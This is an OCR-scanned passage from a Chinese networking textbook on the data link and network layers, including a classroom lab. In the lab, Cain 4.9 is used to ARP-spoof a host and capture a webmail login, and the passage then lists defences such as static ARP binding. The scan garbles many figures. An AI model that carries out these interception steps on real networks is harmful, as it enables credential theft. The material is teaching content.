(1) 安装 Winpcap 抓 包 工具 。 主 机 1 下 载 Cain 4. 9 监听 工具 , 先 安 装 文件 夹 内 的 
“Winpcap” 网 络 抓 包工 具 。 

(2) 过 滤 协 议 类 型 。 在 文件 夹 内 找到 “svchost. exe” 可 执行 文件 ,双击 进入 Cain 4. 9 监 
听 界 面 ,在 “配置 对 话 框 "界面 中 选中 监听 网 卡 ,其 IP 为 “192. 168. 1. 10”, 如 图 4-13 所 示 。 


Challengs 欺 骗 | 过 泥 与 端口 | HTTP 表 | 追踪 路 由 | 
嗅 探 器 1 APR ( Arp Poison Routing ) | 


| | \nevi ce TF TI 
evi ce WIP cener 


| 192.168.1.10 255.255.255.0 


0.0.0.0 0.0.0.0 


Winpeap 版 本 
4.1.0.902 


图 4-13 指定 监听 网 卡 
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(3) 扫描 IP-Mac 地 址 映射 关系 。 单 击 左 上 角 Ty Pr 
网 卡 标签 让 网 卡 处 于 “混杂 ”模式 ,然后 通过 “ 嗅 探 [网 | 电 加 二 器 出 |+ 面 | 加 | 梧 呆 
器 ”扫描 整个 网 段 “IP-Mac” 地 址 映射 关系 。 从 图 414 i 人 FE 
中 可 以 看 到 ,目标 主机 2(IP: 192. 168. 1. 30) 已 经 出 大 
现在 列表 中 ,同时 还 有 充当 网 关 的 路 由 器 (IP: 192. 
168. 1. 1) 和 其 他 客户 机 (IP: 192. 168. 1. 201) 。 

(4) 对 主机 2 实行 ARP 欺骗。 选择 ARP 选项 
卡 , 对 目标 主机 进行 ARP 欺骗 。 如 图 15 所 示 , 在 左边 列表 框 中 选中 待 攻 击 的 目标 主机 (IP: 
192. 168. 1. 30) ,右边 列表 框 是 其 攻击 前 正确 的 ARP 映射 关系 ,选中 攻击 映射 记录 “192. 168. 1. 
1-000FE24EC878” 对 主机 2 实施 ARP 欺骗 。 


图 4-14 扫描 IP-Mac 映射 关系 


Ce ww | 
图 4-15 选中 待 攻击 的 ARP 映射 关系 


(5) 印证 ARP 攻击 效果 。 在 主机 2 输入 命令 “arp -a” ,发 现 此 后 发 往 网 关 *192. 168. 1. 1” 
的 Mac 地 址 更 新 为 主机 1 的 Mac 地 址 ,如 图 4-16 所 示 。 


E:VWINDOWSVsystea32Vcad exe [- 吕 [>] 


Nicrosoft Windows XP [版 本 5.1.2699] 
kc》 版权 所 有 1985-28@1 Microsoft Corp- 


C:\Documents and Settings\Elsaleeyarp -a 


LD 


Interface: 192.168.1.38 —— 9x2 
Internet Address Physical fddress Type 
192.168.1.1 90-98-27-fc-4a-87 dynanic 
192.168.1.10 90-90-27-fc-4a-07 dynanic 


“| 


图 4-16 ARP 欺骗 效果 


(6) 登录 新 浪 邮箱 接收 邮件 。 在 主机 2 模拟 王 某 登 录 新 浪 邮箱 的 情境 ,如 输入 用 户 名 
为 "aaaa”, 密 码 为 "1234”, 进 入 免费 邮箱 ,如 图 4-17 所 示 。 


入 念 的 安全 设置 不 允许 网 站 使 用 安装 在 您 的 计算 机 上 的 ActiveX 控件 。 此 页 可 能 没有 


登录 各 | aaaa 齐 码 。。。 选择 去 向 “vi | 登录 了 


新 闻 军事 社会 1 全 和 | 博客 重要 
MW RE 到 < 视频 播客 
ooag 箱 


Sina.com.cn 
科技 手机 数码 i 同名 邮箱 ”| 房产 家 居 


图 4-17 登录 新 浪 邮箱 65 
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(7) 在 主机 1 中 查阅 账号 名 和 密码 。 选 择 “ 口 令 ” 选 项 卡 ,在 HTTP 协议 中 发 现 王 某 登 
录 新 浪 邮箱 的 用 户 名 为 “aaaa”, 密 码 是 “1234”, 新 浪 邮件 服务 器 IP 是 “202. 205. 3. 41”, 目 标 
主机 IP 是 “192. 163. 1. 30”, 如 图 4-18 所 示 。 


加 文件 中 查看 WD 配置 @) 工具 上 帮助 oD 


| 三 页 国 霹 路 周二 名 台电 司 四 本 匠 国 奈 时 加 
区 3 | 坎 吧 品 [ 六 分析 [57 不 六 加 [和 到 中 


08/08/2009 ~ 22:41:44 202.205.3.41 192.168.1.2 ssass 


4 1234 
06/08/2009 - 23:42:04 [ 202. 205. 3.41 192. 168.1.30 wes 1234 | 


加 Telnet oO) 


图 4-18 截获 的 账号 名 和 密码 


任 甸 总结 短 


交换 式 局 域 网 主机 基于 Mac 地 址 通信 ,主机 通过 查询 本 地 “IP-Mac” 地 址 映射 表 (ARP 
表 ) 转 发 数据 帧 。ARP 表 中 的 记录 会 动态 刷新 以 适应 网 络 变化 ,ARP 欺骗 原理 就 是 向 目标 
主机 发 送 ARP 伪造 包 更 新 表 中 网 关 的 映射 关系 ,是 它 指 向 监听 主机 。 此 后 ,目标 主机 发 给 
网 关 的 数据 帧 会 先 发 至 监听 主机 ,由 监听 主机 代为 转发 到 网 关 , 从 而 造成 信息 泄露 。 防 范 
ARP 攻击 主要 有 以 下 措施 。 

(1) 由 于 ARP 表 中 的 记录 会 动态 更 新 , 故 为 避免 攻击 可 以 静态 配置 网 关 “IP- Mac” 地 
址 映射 关系 。 用 记事 本 编写 批 处 理 文 件 , 内 容 如 下 。 

@echo off 

arp -s 网 关 IP 地 址 网关 Mac 地 址 (例如 本 例 中 为 arp -s 192. 168. 1. 1 00-0F- 
E24E-C8-78)。 

变更 文件 名 为 “1. bat” 批 处 理 文件 ,并 拖 至 “开始 ”->“ 所 有 程序 ”>“ 启 动 ” 栏 中 。 此 后 计 
算 机 每 次 启动 都 会 自动 加 载 该 批 处 理 命令 ,静态 绑 定 网 关 映 射 关系 。 

(2) ARP 病毒 可 以 通过 广播 ARP 伪造 包 造 成 主机 无 法 接 入 Internet。 对 于 ARP 广播 
病毒 可 以 禁止 其 更 改 “nnptools. dll” 文 件 。“npptools. dll" 文 件 是 Windows 系统 中 动态 库 
(network packet provider tools helper) , 常 被 ARP 病毒 利用 更 改 网 关 映 射 关 系 导 致 无 法 上 
网 。 只 要 禁止 写 人 “npptools. dl" 文 件 ,ARP 病毒 则 失去 作用 。 在 安全 模式 中 ,打开 
“Windows\System32\npptools. dll” 文 件 , 将 其 属性 改 为 只 读 。 


让 知识 拓展 
网 桥 和 交换 机 都 属于 数据 链 路 层 网 联 设备 。 网 桥 单 进 单 出 ,用 于 连接 相同 网 段 组 成 更 
大 规模 局 域 网 ; 交换 机 实质 上 是 一 个 多 端口 网 桥 ,每 个 端口 既 可 以 连接 不 同 主机 组 成 星 形 局 


域 网 ,也 可 以 与 其 他 交换 机 连接 组 成 更 大 规模 的 局 域 网 。 从 功能 上 说 ,交换 机 和 网 桥 相 同 , 但 
交换机 吞吐 量 更 高 ,接口 数量 更 多 ,因此 交换 机 迅速 取代 网 桥 成 为 交换 式 局 域 网 连接 核心 。 


4.3.1 交换 机 工作 原理 
交换 机 通过 局 域 网 数据 帧 源 地 址 确定 节点 的 端口 位 置 。 它 通过 学 习 , 建 立 和 维护 * 端 
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口 -Mac” 关 系 映射 表 , 用 于 记录 与 端口 直接 连接 的 主机 节点 ,交换 机 根据 映射 表决 定数 据 帧 往 
哪个 端口 转发 。 由 于 不 同 网 络 数据 帧 格式 会 不 同 ,因此 交换 机 只 能 连接 同 种 类 型 的 局 域 网 ?。 
在 图 4-19 中 ,4 台 主 机 通过 交换 机 组 成 星 形 局 域 网 ,内 部 主机 通过 数据 帧 Mac 地 址 转 
发 。 因 此 ,主机 A 把 数据 发 往 主机 C, 必 须 先 知道 主机 C 的 Mac 地 址 。 主 机 A 先 搜索 本 地 
“IP-Mac” 地 址 映射 表 @, 查 找 目的 主机 C*192. 168. 1. 3” 对 应 的 Mac 地 址 为 “00-00-5A-3C- 
69-84”。 此 后 ,主机 A 在 数据 帧 帧 头 填 充 主 机 C 的 Mac 地 址 发 送 至 交换 机 。 交 换 机 在 接收 
到 后 首先 检查 帧 头目 的 地 址 ,根据 “Mac- 端 口 ? 映 射 表 查找 到 主机 C 所 在 端口 号 为 四 ,随即 
将 数据 帧 往 端口 四 转发 。 
交换 机 
地 址 映射 表 


端口 号 Mac 地 址 

图 “| 00-00-5A-3C-69-84 _ |< 

@ | 00-00-37-9A-82-6C 
交换 机 端口 映射 表 


(4) 
1921680730 005A ec- 
IP-Mac 地 址 映射 表 
A B 心 


192.168.1.1 192.168.1.2 192.168.1.3 。 192.168.1.4 
图 4-19 交换 机 工作 原理 


然而 ,交换 机 在 初始 化 状态 下 “Mac- 端 口 " 映 射 表 没有 任何 记录 。 此 时 ,主机 A 把 数据 
发 往 主机 C, 先 搜索 本 地 ARP 映射 表 查找 主机 C*192. 168. 1. 3? 对 应 的 Mac 地 址 , 若 没有 找 
到 该 记录 则 发 送 ARP 广播 帧 向 整个 网 络 提交 查询 请 求 。 如 图 4-20(a) 所 示 ,主机 A 将 查询 
信息 写 入 数据 帧 ,并 以 *FF-FF-FF-FF-FF-FF”@ 作 为 目的 地 址 发 送 至 交换 机 ; 交换 机 接收 


”由 于 网 桥 是 在 数据 链 路 层 转发 ,基于 Mac 地 址 转发 ,不 涉及 IP 网 络 层 , 故 只 能 连接 相同 类 型 的 网 络 。 对 于 不 同 
类 型 网 络 , 网 桥 由 于 无 法 识别 对 方 数据 帧 而 无 法 转发 。 如 星 形 局 域 网 和 星 形 局 域 网 可 以 通过 网 桥 连 接 成 更 大 的 星 形 局 
域 网 ,而 总 线 型 局 域 网 和 环形 局 域 网 用 网 桥 无 法 连接 ,只 能 通过 路 由 器 对 IP 地 址 进行 转发 。 

@ ”主机 的 “IP-Mac” 地 址 映射 表 也 称 为 ARP 表 ,ARP 协议 在 稍 后 章节 将 会 详细 讲述 。 具 体 映射 关系 可 在 运行 窗口 
输入 “arp -a" 查 阅 ,如 下 图 所 示 。 对 于 主机 192. 168. 1. 20 来 说 ,把 数据 发 送 给 192. 168. 1. 10, 即 把 数据 发 送 给 Mac 地 
址 为 “00-90-27-fc-4a-06” 的 主机 。 


命令 提示 符 -jlx| 


icrosoft Windows XP [| 5.1.2688] - 
C》 版 权 所 有 1985-28@1 Microsoft Corp- i 


:Varp -a 
nterface: 192.168-1-28 一 一 Bx2 
Internet fddress Physical fddress 1 
192.168.1.18 88-98-27-fc-4a-86 dynanic 工 


2 | 
回 ”Mac 地 址 为 "FF-FF- FF-FF- FF-FF" 称 为 广播 地 址 ,网 络 中 其 他 主机 即使 自身 Mac 地 址 不 吻合 也 必须 接收 。 
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到 数据 帧 后 先 检查 数据 帧 源 地 址 ,将 主机 A 的 Mac 地 址 添加 到 端口 映射 表 中 从 而 确定 主机 
A 位 置 ,这 个 过 程 被 称 为 自学 习 。 然 后 ,再 检查 数据 帧 目的 地 址 ,若是 广播 地 址 则 将 数据 帧 
复制 转发 至 所 有 端口 中 ,如 图 4-20(b) 所 示 ; 网 络 中 所 有 节点 都 接收 到 来 自主 机 A 发 送 的 
查询 请 求 , 但 只 有 主机 C 会 做 出 响应 0, 将 自身 Mac 地 址 “00-00-5A-3C-69-84” 写 入 相应 帧 ， 
以 主机 A 的 Mac 地 址 作为 目的 地 址 发 送 给 交换 机 。 交 换 机 接收 到 主机 C 返回 的 应 答 帧 ， 
同样 先 检查 数据 帧 源 地 址 ,将 主机 C 的 Mac 地 址 添加 至 端口 映射 表 , 从 而 确定 主机 C 的 位 
置 。 然 后 ,交换 机 再 检查 数据 帧 目的 地 址 ,根据 映射 表 往 端口 四 转发 ,如 图 4-20(c) 所 示 ; 
最 后 ,主机 A 接收 到 主机 C 返回 的 应 答 信息 ,在 获得 目的 Mac 地 址 后 将 数据 发 至 主机 C, 如 
图 4-20(d) 所 示 。 


4.3.2 交换 机 对 数据 帧 的 处 理 方式 


交换 机 在 接收 到 数据 帧 后 必须 查阅 地 址 映射 表 转 发 至 相应 端口 。 在 具体 转发 过 程 中 ， 
交换 机 对 数据 帧 的 处 理 方式 主要 有 存储 转发 直通 转发 和 碎片 丢弃 3 种 。 

(1) 存储 转发 。 当 交换 机 接收 到 数据 帧 部 分 比特 时 , 暂 存 于 端口 缓存 中 ,直至 接收 到 完 
整 的 数据 帧 2 后 再 根据 帧 首 校 验 位 对 帧 数据 检 错 。 如 果 检 测 到 错误 , 则 丢弃 该 帧 ; 若 检验 
无 误 , 则 读 取 数据 帧 目的 地 址 ,并 从 端口 映射 表 中 查找 端口 号 转发 至 相应 端口 。 存 储 转 
发 是 交换 机 最 基本 的 转发 方式 ,可 靠 性 高 ,能 对 数据 帧 进行 检 错 ,但 会 产生 较 大 延迟 , 转 

(2) 直通 转发 。 直 通 转发 也 被 称 为 快速 转发 ,是 指 交换 机 在 接收 到 帧 头 ( 数 据 帧 第 6 
个 字 节 存放 目的 Mac 地 址 ) 后 立刻 读 取 目 的 地 址 进行 转发 9, 避免 存储 转发 产生 的 延迟 ， 
交换 速度 快 , 但 可 靠 性 低 , 不 能 对 帧 数据 进行 检 错 ,错误 的 数据 帧 和 碎片 帧 9 同样 也 被 

(3) 碎片 丢弃 。 碎 片 丢 弃 是 存储 转发 和 穿 通 两 种 交换 方式 的 折 中 , 当 交 换 机 从 端口 中 
接收 满 64B(512b) 时 ,立刻 读 取 数据 帧 目的 地 址 进行 转发 。 由 于 以 太 网 最 小 帧 长 度 为 
512b, 如 果 接 收 到 的 数据 帧 小 于 512b 即 判 为 是 帧 碎片 ,被 交换 机 丢弃 ,因此 碎片 丢弃 交换 
方式 也 被 称 为 无 碎片 直通 转发 ,处 理 速度 比 存储 转发 快 ,但 比 穿 通 方式 慢 。 虽 然 它 不 能 对 数 
据 帧 检 错 ,但 能 有 效 过 滤 帧 碎片 , 故 被 广泛 应 用 于 交换 机 中 。 


4.3.3 交换 机 和 集线器 的 区 别 


虽然 交换 机 和 集线器 都 可 以 用 来 组 建 局 域 网 ,但 集线器 是 物理 层 网 联 设备 ,通过 广播 确 
保 将 数据 帧 发 送 至 目的 主机 ,一 节点 发 送 数据 其 他 节点 都 不 能 发 送 ,和 否则 会 产生 冲突 ,因此 
用 集线器 组 成 的 局 域 网 处 于 同一 个 冲突 域 ( 或 称 广播 域 ) 。 交 换 机 是 数据 链 路 层 网 联 设备 ， 
通过 查找 Mac 地 址 转发 数据 帧 ,不 会 广播 至 所 有 网 段 。 因 此 ,交换 机 不 同 端口 处 于 不 同 冲 
突 域 ,在 局 域 网 内 传输 ,一 节点 发 送 数据 其 他 端口 主机 同样 可 以 发 送 。 交 换 机 通过 划分 


因为 待 查询 IP 与 主机 C 的 IP 相同 。 

在 以 太 网 中 完整 数据 帧 最 小 长 度 为 512b(64B) 。 
记忆 : 来 多 少 转发 多 少 ,不 必 等 齐 一 帧 再 转发 。 
碎片 帧 即 不 完整 的 数据 帧 ,因数 据 冲 撞 或 冲突 造成 


©@ee 
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冲突 域 可 以 起 到 隔离 广播 ,增加 带宽 的 作用 。 在 图 4-21 中 ,冲突 域 1 中 的 某 一 主机 发 送 
的 数据 不 会 广播 至 其 他 冲突 域 , 因 此 处 于 不 同 冲突 域 中 的 主机 可 以 同时 发 送 数据 而 不 会 
导致 冲突 。 


et 
(VD © G3 
冲突 域 串 突 城 2 冲突 域 3 


dm 


图 4-21 交换 机 隔离 广播 域 


4.3.4 数据 链 路 层 安 全 


目前 ,网 络 中 针对 数据 链 路 层 攻 击 主 要 有 两 种 ,分 别 是 ARP 欺骗 和 Mac 地 址 泛 洪 。 

(1) ARP 欺骗 攻击 。ARP 欺骗 攻击 是 基于 ARP 地 址 解析 协议 中 动态 更 新 “IP-Mac” 
映射 的 机 制 ,通过 伪造 ARP 包 进 行 攻击 , 轻 则 引发 上 网 断 线 , 重 则 导致 数据 泄密 。 针 对 此 
类 攻击 有 多 种 防范 措施 ,如 添加 Mac 地 址 静态 绑 定 、 安 装 ARP 防火 墙 等 。 

(2) Mac 地 址 泛 洪 。 交 换 机 会 主动 学 习 客 户 端 Mac 地 址 并 建立 和 维护 端口 地 址 映射 
表 。 虽 然 不 同 交 换 机 存储 的 Mac 地 址 表 不 同 ,但 大 小 是 固定 的 。Mac 地 址 泛 洪 攻击 是 向 交 
换 机 发 送 大量 的 伪造 ARP 包 , 快 速 填 满 其 映射 地 址 表 ?。 当 交换 机 地 址 表 被 填充 满 后 ,无 
法 再 存储 其 他 主机 Mac 地 址 信息 。 为 确保 目的 节点 能 接收 到 数据 帧 ,交换 机 只 能 以 广播 方 
式 转发 到 所 有 端口 上 去 。 这 时 ,攻击 者 即使 不 对 目的 主机 进行 ARP 欺骗 也 能 截获 其 发 出 
的 比特 流 。 针 对 Mac 地 址 泛 洪 攻击 可 通过 启用 交换 机 最 大 Mac 地 址 限制 .配置 端口 安全 策 
咯 等 方法 解决 ,这 些 将 在 后 续 课程 (网 络 设备 ) 中 学 到 。 


本 章 小 结 


本 章 学 习 了 数据 链 路 层 基本 功能 和 相关 技术 ,重点 要 理解 流量 控制 和 差错 控制 定义 和 
实现 方式 ,掌握 交换 机 3 种 交换 方式 ,分 清 交 换 机 和 集线器 工作 原理 和 区 别 ,从 而 为 网 络 层 
理论 学 习 打 好 基础 。 本 章 知识 结构 如 图 4-22 所 示 。 


@ 目前 ,中 低 端 交换 机 Mac 地 址 表 大 小 在 8KB 左右 ,而 使 用 Dsniff 工具 可 在 lmin 内 产生 15 万 左右 虚假 Mac 地 
址 ,将 8KB 大 小 的 地 址 表 填 充满 。 
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逻辑 链 路 控制 子 层 


数据 链 路 层 


局 域 网 
介质 访问 控制 子 层 


带 填充 字符 的 首尾 界 符 法 
带 填充 位 的 首尾 标志 法 
停 等 协议 
滑动 窗口 协议 
自动 重 发 ARQ 协议 
wma 后 退 N 帧 ARQ 协 议 
选择 性 ARQ 协议 
链 路 管理 
总 线 型 : CSMA/CD 
环形 : 令 牌 环 


成 由 传输 | 


流量 控制 | 


星 形 : 时 分 复 用 
物理 层 


图 4-22 第 4 章 知识 结构 图 


思考 练习 题 


一 、 填 空 题 
1. 局 域 网 涵盖 OSI 参考 模型 的 两 层 ,分 别 是 数据 链 路 层 和 
2. 交换 机 对 数据 帧 的 处 理 有 3 种 方式 ,分 别 是 存储 转发 , 穿 通 和 。 
3. 网 桥 工 作 于 OSI 参考 模型 的 层 , 依 据 地 址 实现 对 数据 帧 的 存储 、 
4. 局 域 网 IEEE 802 标准 将 数据 链 路 层 划 分 为 介质 访问 控制 子 层 与 子 层 。 
5. 数据 链 路 层 要 实现 数据 交换 , 需 经 过 链 路 建立 .数据 传输 和 三 个 过 程 。 
二 、 选 择 题 
1. 对 于 采用 直接 交换 方式 ( 穿 通 ) 的 交换 机 ,其 优点 是 交换 延迟 时 间 短 ,不足 之 处 是 缺 
到 
A. 并 发 交换 能 力 B. 差错 检测 能 力 C. 路 由 能 力 D. 地 址 解析 能 力 
2. 在 交换 式 Ethernet 中 ,有 A、B、C、D 共 4 台 主 机 ,如 果 A 向 B 发 送 数据 , 那 


么 


A. 只 有 B 可 以 接收 到 数据 
C. 只 有 BC,D 可 以 接收 到 数据 

3. 下 列 关 于 局 域 网 的 描述 中 ,正确 的 是 
A. 局 域 网 的 数据 传输 率 高 ,数据 传输 可 靠 性 高 
B. 局 域 网 的 数据 传输 率 低 ,数据 传输 可 靠 性 高 
C. 局 域 网 的 数据 传输 率 高 ,数据 传输 可 靠 性 低 
D. 局 域 网 的 数据 传输 率 低 ,数据 传输 可 靠 性 低 

4. 通常 数据 链 路 层 交 换 的 数据 单元 被 称 为 。 


B. 4 台 主 机 都 能 接收 到 数据 
D. 4 台 主 机 都 不 能 接收 到 数据 


A. 报 文 B. 帧 C. 报 文 分 组 D. 比特 
5. 局 域 网 是 Ethernet 的 核心 技术 是 它 的 随机 争 用 型 介质 访问 控制 方法 , 即 
A. Token Ring B. Token Bus C. CSMA/CD D. FDDI 
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6. 交换 机 实质 上 是 一 个 多 端口 的 
A. 中 继 器 B. 集线器 C. 网 桥 D. 路 由 
7. 在 局 域 网 中 ,交换 机 是 按 进行 寻 址 的 。 
A. 邮件 地 址 B. IP 地 址 C，Mac 地 址 D. 网 线 接口 地 址 


8. 当 接收 端 发 现 有 差错 时 ,设法 通知 发 送 端 重 发 ,直到 收 到 正确 的 数据 为 止 ,这 种 差错 
控制 方法 被 称 为 技术 。 


A. 前 向 纠 错 B. 元 余 校 验 C. 混合 差错 控制 D. 自动 请 求 重 发 
9. 在 直接 交换 方式 中 ,局域网 交换 机 只 要 接收 检测 到 目的 地 址 字段 ,就 立即 将 该 帧 转 
发 出 去 ,而 不 管 数据 帧 是 否 出 错 。 此 时 , 帧 出 错 检测 任务 将 由 完成 。 
A. 源 主机 B. 目的 主机 C. 中 继 器 D. 集线器 
10. 数据 链 路 层 向 用 户 提供 
A. 点 到 点 服务 B. 端 到 端 服 务 
C. 发 送 方 到 接收 方 服务 D. 源 节点 到 目的 节点 服务 
11. 交换 机 一 个 端口 的 数据 传输 速率 是 100Mbps, 若 该 端口 支持 全 双 工 通信 ,那么 这 个 
端口 的 实际 数据 传输 速率 可 以 达到 
A. 50Mbps B. 100Mbps C. 200Mbps D. 400Mbps 
12. 以 下 不 是 决定 局 域 网 特性 的 要 素 是 。 
A. 传输 介质 B. 网 络 拓扑 C. 介质 访问 控制 方法 ”D. 传输 距离 
13. 流量 控制 的 速度 实质 上 是 由 决定 的 。 
A. 发 送 方 B. 接收 方 
C. 发 送 方 和 接收 方 D. 发 送 方 和 接收 方 间 的 中 间 节 点 


14. IEEE 802 局 域 网 标准 在 数据 链 路 层 再 划分 为 两 个 子 层 ,其 中 流量 控制 ,差错 控制 
处 理 等 功能 放 在 完成 。 


A，LLC 子 层 B. Mac 子 层 C. 物理 层 D. 传输 层 
15. 下 面 不 属于 交换 机 的 功能 是 

A. 流量 控制 B. 控制 广播 C. 提高 系统 带宽 D. 避免 广播 风暴 
16. 下 列 纠 错 码 既 能 发 现 错误 ,又 能 纠正 错误 的 是 。 

A. 奇偶 校 验 码 B. 循环 元 余 检验 码 

C. 群 计数 D. 海 明 码 
17. 以 下 不 属于 数据 链 路 层 的 功能 是 

A. 数据 纠 错 B. 链 路 管理 C. 点 到 点 通信 D. IP 过 虑 


18. 在 CSMA/CD 访问 控制 中 ,如 果 一 节点 要 发 送 数据 , 则 必须 
A. 等 待 空 令 牌 B. 等 待 发 送 时 间  C. 等 待 总 线 空 闲 D. 等 待 发 送 权 

19. 下 面 不 属于 传统 的 共享 介质 局 域 网 的 是 

A. 总 线 型 以 太 网 B. 令 牌 总 线 网 C. 令 牌 环 网 D. 交换 式 以 太 网 
、 简 答题 
. 简 述 链 路 层 的 功能 和 作用 。 
. 简 述 集线器 和 交换 机 的 区 别 。 
. 简 述 交换 对 数据 帧 的 3 种 处 理 方式 。 
. 简 述 CSMA/CD 实现 步骤 。 


woo 
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网 络 层 处 于 OSI 参考 模型 的 第 三 层 , 在 数据 链 路 层 基 础 上 将 发 送 方 数据 分 组 以 接力 方 
式 通 过 路 由 器 跳 0 至 目的 节点 ,并 解决 子 网 之 间 路 由 、 寻 址 和 拥塞 等 问题 ,使 异 构 局 域 网 络 
连接 成 全 球 统一 网 络 。 本 章 主要 介绍 网 络 层 功能 和 作用 ,重点 讲述 路 由 算法 、IP 地 址 计算 
和 子 网 划分 ,最 后 通过 真实 的 工作 过 程 分 析 网 络 层 存在 的 安全 性 问题 。 

学 引 目 标 

1. 知识 目标 

(1) 识 记 网 络 层 功能 和 作用 。 

(2) 理解 造成 网 络 拥塞 的 原因 和 解决 方案 。 

(3) 识 记 路 由 算法 分 类 。 

(4) 识 记 IP 地 址 分 类 和 特殊 IP 含义 。 

(5) 理解 路 由 器 工作 原理 。 

2. 能 力 目 标 

(1) 掌握 IP 地 址 和 子 网 掩 码 的 计算 。 

(2) 掌握 距离 矢量 路 由 算法 。 

(3) 掌握 子 网 划分 方法 和 应 用 。 


5.1 网 络 层 基本 功能 
5.1.1 网 络 层 功能 


之 间 的 连接 ,也 可 理解 为 发 送 方 与 接收 方 之 间 的 连接 。 然 而 ,双方 节点 之 间 存 在 多 个 路 由 器 
转发 ,网 络 层 必 须 了 解 通信 子 网 拓扑 结构 ,选择 最 佳 路 径 , 同 时 还 要 避免 线路 过 载 或 空闲 ,从 
而 解决 网 络 拥塞 .流量 控制 等 问题 。 网 络 层 的 主要 功能 归纳 如 下 。 

1. 路 由 选择 

网 络 层 的 最 主要 任务 就 是 将 数据 包 ( 数 据 分 组 ) 从 源 节 点 发 送 至 目的 节点 ,途中 可 能 存 
在 多 条 通路 。 所 谓 路 由 选择 ,就 是 在 复杂 变化 的 网 络 拓扑 中 选择 一 条 最 佳 最 便捷 的 路 径 抵 
达 目 的 节点 。 


@@ 分 组 后 的 数据 形象 被 称 为 数据 包 ,数据 包 每 经 过 一 个 路 由 器 叫 作 一 跳 。 
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2. 拥塞 控制 

当 网 络 中 的 通信 和 量 超过 承载 能 力 时 ,整个 网 络 性 能 呈 级 数 下 降 直 至 崩溃 ,这 种 现象 被 称 
为 拥塞 ,如 图 5-1 所 示 。 由 于 信息 量 超 过 路 由 器 处 理 能 力 会 导致 丢 包 重 发 , 重 发 的 数据 包 又 
进一步 加 剧 网 络 负荷 ,因而 导致 路 由 器 几乎 无 法 投递 任何 数据 包 。 瘫 痪 的 路 由 器 由 于 无 法 
工作 ,数据 包 会 择 路 而 走 , 既 增加 了 网 络 中 包 数 量 ,又 增加 了 其 他 路 由 器 负担 ,最 终 导致 
网 络 中 所 有 路 由 器 停止 工作 ,整个 网 络 陷 和 瘫痪 。 在 实际 中 ,网 络 拥塞 是 由 多 种 因素 造 
成 的 。 


投递 包 数 
最 大 从 到 


瘫痪 


发 送 包 数 
图 5-1 网 络 拥塞 现象 


(1) 路 由 器 内 存 不 足 

如 图 5-2 所 示 ,路 由 器 R2 内 存 不 足 , 当 超过 其 处 理 能 力 时 ,由 于 缺少 足够 缓存 存储 新 发 
过 来 的 数据 包 而 引发 丢 包 现象 ; 若 向 R2 发 送 数据 包 的 路 由 器 R1 没有 收 到 R2 返回 的 应 答 
直到 超时 , 则 会 认为 数据 包 在 线路 中 丢失 ,重新 发 送 数 据 包 ,而 重 发 的 数据 包 再 次 被 R2 丢 
弃 ; R1 忙 着 重 发 数据 包 , 导 致 不 能 及 时 处 理 R3 和 R4 发 送 过 来 的 数据 包 , 直到 端口 缓存 溢 
出 后 开始 丢 包 ; R3 和 R4 没有 收 到 来 自 Rl 返回 的 应 答 直 到 超时 ,不 断 重新 发 送 被 丢弃 的 
数据 包 , 如 此 反复 ,导致 拥塞 从 R1 蔓延 至 整个 网 络 ,最 终 整 个 网 络 陷 人 次 痰 。R1 是 网 络 的 
瓶颈 ,适当 增加 R1 内 存 可 以 改善 拥塞 现象 ,但 内 存 太 多 ,数据 包 列队 等 待 时 间 过 长 同样 会 
造成 Rl 计时 器 超时 重 发 。 


图 5-2 路 由 器 内 存 不 足 导致 拥塞 


(2) 线路 带宽 浪费 

线路 带宽 浪费 在 共享 式 局 域 网 中 很 常见 。 例 如 ,在 总 线 型 网 络 中 采用 CSMA/CD 竞争 
机 制 发 送 数据 , 当 网 络 中 节点 过 多 时 ,节点 用 于 竞争 的 时 间 会 远 远 大 于 数据 传输 的 时 间 , 从 
而 导致 信道 浪费 。 

此 外 ,路 由 器 处 理性 能 不 高 线路 带宽 低下 、 较 差 的 路 由 选择 策略 等 也 会 造成 拥塞 。 网 
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络 中 性 能 较 低 的 路 由 器 是 整个 网 络 的 瓶颈 ,犹如 短 板 效应 。 只 有 当 系 统 中 所 有 设备 达到 平 
衡 时 ,才能 很 好 解决 拥塞 问题 。 

3. 差错 控制 (可 选 ) 

差错 控制 是 检测 和 纠正 传输 错误 的 机 制 。 当 数据 链 路 层 没有 对 数据 帧 进行 差错 控制 
时 ,数据 检 错 任务 可 由 网 络 层 负责 ; 当 网 络 层 也 没有 对 数据 包 进 行 差错 控制 时 , 检 错 任务 可 
由 传输 层 负责 。 因 此 ,差错 控制 是 网 络 层 的 可 选 功能 ,在 3 层 中 的 任何 一 层 完成 都 可 以 ,但 
假如 3 层 都 不 进行 差错 控制 ,数据 就 有 可 能 出 错 。 

4. 流量 控制 (可 选 ) 

网 络 层 对 数据 包 进行 流量 控制 ,负责 匹配 收发 双方 速率 。 另 外 ,流量 控制 也 可 以 由 数据 
链 路 层 完 成 ,对 数据 帧 进行 流量 控制 。 


5.1.2 网 络 层 两 种 传输 方式 


为 实现 上 述 功能 ,网 络 层 在 将 数据 切 成 数据 包 后 采取 两 种 方式 在 通信 节点 中 投递 ,分别 
是 无 连接 服务 和 面向 连接 服务 。 

1. 无 连接 服务 

无 连接 服务 也 称 数据 报 传输 方式 。 由 于 传输 层 报 文 太 长 不 利于 传输 , 故 网 络 层 将 报 文 
切 成 单位 更 小 的 分 组 , 称 为 数据 包 。 传 输 时 每 个 数据 包 通 过 不 同 序号 标识 ,并 携带 相同 的 地 
址 信息 在 网 络 中 经 路 由 器 各 自 投 递 。 当 一 个 报 文 的 数据 包 沿 不 同 路 径 乱 序 抵达 目的 节点 
后 ,再 根据 序列 号 拼凑 成 初始 报 文 交 由 传输 层 , 如 图 5-3 所 示 。 


图 5-3 无 连接 服务 


在 无 连接 服务 中 ,收发 双方 在 通信 时 不 需 事 先 建立 连接 ,实现 简单 灵活 ,但 可 靠 性 不 高 ， 
网 络 中 每 个 数据 包 尽 最 大 努力 投递 ,在 网 络 拥塞 情况 下 会 出 现 丢 包 问 题 , 适 用 于 实时 性 不 高 
的 小 量 数据 通信 。 

2. 面向 连接 服务 

面向 连接 服务 和 电话 网 络 相似 ,数据 传输 前 必须 经 过 建立 连接 、 维 持 连 接 和 释放 连接 
3 个 过 程 。 当 收发 双方 确立 逻辑 连接 (R4>R5 一 R3) 后 ,所 有 数据 包 都 沿 这 一 逻辑 通路 按照 
先进 先 出 原则 投递 ,不 能 单独 进行 路 由 选择 ,如 图 5-4 所 示 。 

